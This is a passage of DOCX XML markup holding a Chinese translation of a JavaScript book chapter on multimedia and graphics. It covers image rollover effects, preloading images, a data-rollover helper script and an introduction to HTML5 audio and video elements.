      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>宽泛地讲，该示例受到</w:t>
      </w:r>
      <w:r>
        <w:t>Halfnote</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Aaron Boodman</w:t>
      </w:r>
      <w:r>
        <w:t>的启发。</w:t>
      </w:r>
      <w:r>
        <w:t>Halfnote</w:t>
      </w:r>
      <w:r>
        <w:t>是其中一个离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="Di_21Zhang__Duo_Mei_Ti_He_Tu_Xing_Bian_C"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章　多媒体和图形编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章将介绍如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来操作图片、控制音频和视频流以及画图。</w:t>
      </w:r>
      <w:r>
        <w:t>21.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍如何用传统的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>技术实现诸如图片翻转（鼠标指针移动到一张静态图片上切换成另外一张图片）这样的视觉效果。紧接着</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>21.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素以及它们的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在前两节对图片、音频和视频的介绍之后，接下来会介绍两项非常强大的用于客户端绘图的技术。能够在浏览器中动态生成复杂图形是非常重要的，因为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用于在客户端生成图形的代码大小要比图片本身小很多，这样可以减少部分带宽。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>通过一些实时数据来动态生成图形，需要消耗大量的</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>周期。而如果把这个任务放到客户端做，就可以有效地减轻服务器的负担，某种程度上也是节约了硬件开销。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在客户端生成图形也是符合现代</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>的架构：服务器提供数据，然后客户端负责展现这些数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>21.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节会介绍可伸缩的矢量图形（</w:t>
      </w:r>
      <w:r>
        <w:t>Scalable Vector Graphics</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>是一种基于</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>的并且用于描述图形的语言，</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>来创建和操控。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>21.4</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素及其用于客户端画图的、功能齐全的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>。＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素是一项革命性的技术，本章会对它做详细的介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="21_1_Jiao_Ben_Hua_Tu_Pian_"/>
      <w:r>
        <w:t>21.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化图片</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来嵌入图片。</w:t>
      </w:r>
      <w:r>
        <w:t>和所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素一样，＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素也是可以通过脚本来操控的：设置元素的</w:t>
      </w:r>
      <w:r>
        <w:t>s rc</w:t>
      </w:r>
      <w:r>
        <w:t>属性，将其指向一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>会导致浏览器载入（如果需要的话）并展示一张新的图片。（还可以通过脚本来控制图片的宽度和高度，这会使得浏览器缩小和放大图片，但是这种技术这里不会做介绍。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中动态替换图片，这样一种能力，使得许多特效成为可能。其中最常用的特效就是图片翻转，图片会随着鼠标指针划过进行替换。如果图片本身包含超链接，并且可单击，那么图片翻转这种特效是一种引导用户单击图片非常有效的方式。（实现同样的效果也可以不使</w:t>
      </w:r>
      <w:r>
        <w:t>用脚本，而是使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>:hover</w:t>
      </w:r>
      <w:r>
        <w:t>伪类，替换元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素的背景图片来实现。）如下的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码段是一个非常简单的例子：它创建一张图片，并在鼠标指针经过的时候改变该图片：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img src="images/help.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmouseover="this.src='images/help_rollover.gif'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmouseout="this.src='images/help.gif'"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当鼠标指针经过或者离开＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素时候，事件处理程序会重新设置其</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性。图片翻转和鼠标单击紧密联系在</w:t>
      </w:r>
      <w:r>
        <w:t>一起，因此＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素应当包含在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中或者指定一个</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了有用起见，像图片翻转这样的效果需要较高响应度。这也意味着需要想办法来确保一些必要的图片要预提取，让浏览器缓存起来。客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个专用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来达到这一目的：为了强制让图片缓存起来，首先利用</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来创建一个屏幕外图片对象，之后，将该对象的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置成期望的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。由于图片元素并没有添加到文档中，因此，它是不可见的，但是浏览器还是会加载图片并将其缓存起来。这样一来，之后当设置</w:t>
      </w:r>
      <w:r>
        <w:t>成同样的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来显示该屏幕内图片的时候，它就能很快从浏览器缓存中加载，而不需要再通过网络加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>前面展示的图片翻转的代码片段并没有预提取它使用的翻转图片，这样，当用户第一次将鼠标指针移到图片上的时候会明显感到翻转效果有延时。要解决这个问题，将代码修改成如下形式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>(new Image()).src="images/help_rollover.gif";</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>img src="images/help.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmouseover="this.src='images/help_rollover.gif'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmouseout="this.src='images/help.gif'"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="523" w:name="You_Ya_De_Tu_Pian_Fan_Zhuan_Shi_Xian_Fan"/>
      <w:r>
        <w:t>优雅的图片翻转实现方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>刚刚展示的代码需要一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和两个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的属性来实现一个简单的图片翻转效果。这个例子的代码非常不优雅：大量的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码混在一起。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一种更为优雅的实现方式，这种方式允许在任意的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上，只要简单地指定了</w:t>
      </w:r>
      <w:r>
        <w:t>data-roll</w:t>
      </w:r>
      <w:r>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），就会创建一个图片翻转效果。要注意的是，该例使用了例</w:t>
      </w:r>
      <w:r>
        <w:t>13-5</w:t>
      </w:r>
      <w:r>
        <w:t>中介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。同时它还用到了</w:t>
      </w:r>
      <w:r>
        <w:t>document.images[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组（参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）从文档中查找所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-1</w:t>
      </w:r>
      <w:r>
        <w:t>：优雅的图片翻转实现方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>*rollover.js:</w:t>
      </w:r>
      <w:r>
        <w:t>优雅的图片翻转实现方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>要创建图片翻转效果，将此模块引入到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>然后在任意＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上使用</w:t>
      </w:r>
      <w:r>
        <w:t>data-rollover</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定翻转图片的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如下所示</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">img </w:t>
      </w:r>
      <w:r>
        <w:t>src="normal_image.png"data-rollover="rollover_image.png"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是，此模块依赖于</w:t>
      </w:r>
      <w:r>
        <w:t>onLoad.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onLoad(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>所有处理逻辑都在一个匿名函数中</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>不定义任何符号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历所有的图片，查找</w:t>
      </w:r>
      <w:r>
        <w:t>data-rollover</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>document.images.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var img=document.images[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rollover=img.getAttribu</w:t>
      </w:r>
      <w:r>
        <w:t>te("data-rollover");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!rollover)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过没有</w:t>
      </w:r>
      <w:r>
        <w:t>data-rollover</w:t>
      </w:r>
      <w:r>
        <w:t>属性的图片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>确保将翻转的图片缓存起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(new Image()).src=rollover;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个属性来标识默认的图片</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.setAttribute("data-rollout",img.src);//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理函数来创建翻转效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.onmouseover=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.src=this.getAttribute("data-rollover");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>img.onmouseout=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.src=this.getAttribute("data-rollout");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24" w:name="21_2_Jiao_Ben_Hua_Yin_Pin_He_Shi_Pin_"/>
      <w:r>
        <w:t>21.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化音频和视频</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从理论上说，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>引入的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，使用起来和＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素一样简单。对于支持</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器，不再需要使用插件（像</w:t>
      </w:r>
      <w:r>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:t>）来在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中嵌入音频和视频：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio src="bac</w:t>
      </w:r>
      <w:r>
        <w:t>kground_music.mp3"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>video src="news.mov"width=320 height=240/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，使用这些元素的时候要更加巧妙。由于各家浏览器制造商未能在对标准音频和视频编解码器支持上达成一致，因此，通常都需要使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
